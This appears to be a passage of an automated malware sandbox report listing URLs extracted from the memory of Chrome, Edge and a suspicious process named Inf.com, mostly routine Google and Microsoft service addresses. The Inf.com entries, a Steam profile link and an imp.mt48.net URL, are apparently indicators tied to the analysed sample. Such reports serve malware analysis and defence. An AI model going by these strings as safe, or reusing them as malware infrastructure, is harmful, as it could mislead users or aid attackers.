                Source: chrome.exe, 00000011.00000003.2646384817.000051D8024B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2646527464.000051D8024B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                Source: msedge.exe, 00000019.00000002.2937556808.00005104046D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                Source: chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/googleapis.com
                Source: chrome.exe, 00000011.00000002.2695062193.000051D80060C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.com/
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                Source: Inf.com, 0000000D.00000002.3277634519.0000000004605000.00000004.00000800.00020000.00000000.sdmp, LNOHDB.13.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                Source: msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                Source: msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                Source: msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                Source: msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                Source: msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                Source: msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                Source: msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                Source: msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                Source: msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                Source: msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                Source: msedge.exe, 00000019.00000003.2865793489.0000510404780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                Source: msedge.exe, 00000015.00000003.2756846802.000054E000384000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                Source: chrome.exe, 00000011.00000002.2694632243.000051D8004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695498959.000051D800740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
                Source: chrome.exe, 00000011.00000002.2694632243.000051D8004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695498959.000051D800740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
                Source: chrome.exe, 00000011.00000003.2599807916.00001EAC00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                Source: chrome.exe, 00000011.00000002.2686928527.00001EAC00238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                Source: chrome.exe, 00000011.00000003.2599684596.00001EAC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599807916.00001EAC00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                Source: chrome.exe, 00000011.00000003.2642278208.000051D8027A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardQ
                Source: chrome.exe, 00000011.00000003.2599684596.00001EAC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599807916.00001EAC00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                Source: chrome.exe, 00000011.00000002.2688036889.00001EAC00904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
                Source: chrome.exe, 00000011.00000003.2599807916.00001EAC00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                Source: chrome.exe, 00000011.00000002.2694476137.000051D800424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2655159315.000051D802B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                Source: chrome.exe, 00000011.00000003.2618312497.000051D80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618312497.000051D801264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618170710.000051D80100C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                Source: chrome.exe, 00000011.00000003.2618312497.000051D80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618312497.000051D801264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618170710.000051D80100C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                Source: chrome.exe, 00000011.00000003.2599684596.00001EAC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2599807916.00001EAC00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
                Source: chrome.exe, 00000011.00000003.2600291805.00001EAC00878000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2688005030.00001EAC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                Source: chrome.exe, 00000011.00000003.2599807916.00001EAC00728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                Source: chrome.exe, 00000011.00000002.2688100118.00001EAC00920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
                Source: chrome.exe, 00000011.00000002.2688100118.00001EAC00920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918=
                Source: chrome.exe, 00000011.00000002.2688005030.00001EAC008D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
                Source: chrome.exe, 00000011.00000003.2641786183.000051D8022BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                Source: chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2602522382.000051D8001C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                Source: chrome.exe, 00000011.00000003.2602522382.000051D8001C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/apiQ
                Source: chrome.exe, 00000011.00000002.2697486285.000051D800CA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/
                Source: chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/:
                Source: chrome.exe, 00000011.00000002.2694476137.000051D800424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2655159315.000051D802B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                Source: chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2699271875.000051D801198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                Source: chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                Source: chrome.exe, 00000011.00000002.2699073368.000051D801120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2699271875.000051D801198000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000011.00000002.2697486285.000051D800CA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/o
                Source: msedge.exe, 00000019.00000002.2937556808.00005104046D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                Source: msedge.exe, 00000019.00000002.2937556808.00005104046D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                Source: Cookies.28.drString found in binary or memory: https://msn.comXID/
                Source: Cookies.28.drString found in binary or memory: https://msn.comXIDv10
                Source: chrome.exe, 00000011.00000002.2695787632.000051D80080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698040666.000051D800D94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694719675.000051D80050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695062193.000051D80060C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
                Source: chrome.exe, 00000011.00000002.2695062193.000051D80060C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGAQ
                Source: chrome.exe, 00000011.00000002.2695136498.000051D800644000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696111849.000051D8008D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694476137.000051D800424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
                Source: chrome.exe, 00000011.00000002.2695336464.000051D8006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696111849.000051D8008D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694476137.000051D800424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
                Source: chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhoneQ
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                Source: chrome.exe, 00000011.00000002.2694476137.000051D800424000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
                Source: chrome.exe, 00000011.00000002.2693279241.000051D8000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2610623348.000051D800F88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myactivity.google.com/
                Source: 2cc80dabc69f58b6_0.27.dr, 000003.log5.27.drString found in binary or memory: https://ntp.msn.com
                Source: QuotaManager.27.drString found in binary or memory: https://ntp.msn.com/_default
                Source: QuotaManager.27.dr, QuotaManager-journal.27.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                Source: QuotaManager.27.dr, QuotaManager-journal.27.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default/
                Source: 2cc80dabc69f58b6_0.27.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
                Source: chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/
                Source: chrome.exe, 00000011.00000002.2693836696.000051D80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
                Source: msedge.exe, 00000019.00000002.2937556808.00005104046D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                Source: chrome.exe, 00000011.00000003.2655020242.000051D802AB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2654594591.000051D802B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                Source: chrome.exe, 00000011.00000003.2656420155.000051D800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                Source: chrome.exe, 00000011.00000003.2655020242.000051D802AB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2654594591.000051D802B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                Source: chrome.exe, 00000011.00000003.2655020242.000051D802AB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2654594591.000051D802B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                Source: chrome.exe, 00000011.00000003.2610074266.000051D8009A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698732265.000051D800F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698121828.000051D800DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698178015.000051D800DF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698703866.000051D800F20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2699454105.000051D801300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                Source: chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 00000011.00000003.2610074266.000051D8009A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698732265.000051D800F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698178015.000051D800DF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                Source: chrome.exe, 00000011.00000002.2698178015.000051D800DF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698703866.000051D800F20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2699454105.000051D801300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
                Source: chrome.exe, 00000011.00000003.2610074266.000051D8009A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698732265.000051D800F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698178015.000051D800DF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2699454105.000051D801300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                Source: chrome.exe, 00000011.00000003.2610074266.000051D8009A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698178015.000051D800DF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698703866.000051D800F20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694062853.000051D8002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2699454105.000051D801300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
                Source: chrome.exe, 00000011.00000003.2610074266.000051D8009A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698732265.000051D800F2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698121828.000051D800DD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698178015.000051D800DF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698703866.000051D800F20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2699454105.000051D801300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697153102.000051D800B9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                Source: chrome.exe, 00000011.00000002.2694632243.000051D8004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
                Source: msedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                Source: msedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                Source: msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxAB
                Source: msedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                Source: msedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                Source: msedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                Source: msedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                Source: msedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                Source: msedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                Source: msedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                Source: msedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                Source: msedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                Source: msedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                Source: msedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                Source: msedge.exe, 00000015.00000003.2752966667.000054E000280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2756110960.000054E000284000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2858539444.000051040467C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                Source: chrome.exe, 00000011.00000002.2696726646.000051D800A4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2693279241.000051D8000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2610623348.000051D800F88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
                Source: chrome.exe, 00000011.00000003.2618312497.000051D80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618312497.000051D801264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2618170710.000051D80100C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                Source: chrome.exe, 00000011.00000002.2693279241.000051D8000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2610623348.000051D800F88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 00000011.00000002.2693162053.000051D800098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                Source: chrome.exe, 00000011.00000002.2693204542.000051D8000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                Source: chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                Source: chrome.exe, 00000011.00000002.2694632243.000051D8004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695498959.000051D800740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000011.00000002.2694632243.000051D8004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697416968.000051D800C64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695498959.000051D800740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
                Source: chrome.exe, 00000011.00000002.2694450601.000051D800418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: chrome.exe, 00000011.00000002.2694476137.000051D800424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2655159315.000051D802B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                Source: Inf.com, 0000000D.00000003.2418360409.0000000004761000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000003.2418518687.0000000001529000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3268617637.00000000000F1000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 0000000D.00000003.2418604420.00000000044E8000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3274095484.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000000D.00000003.2418255884.0000000004469000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000003.2418297625.0000000001505000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000000D.00000003.2418561056.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3276645001.0000000004460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
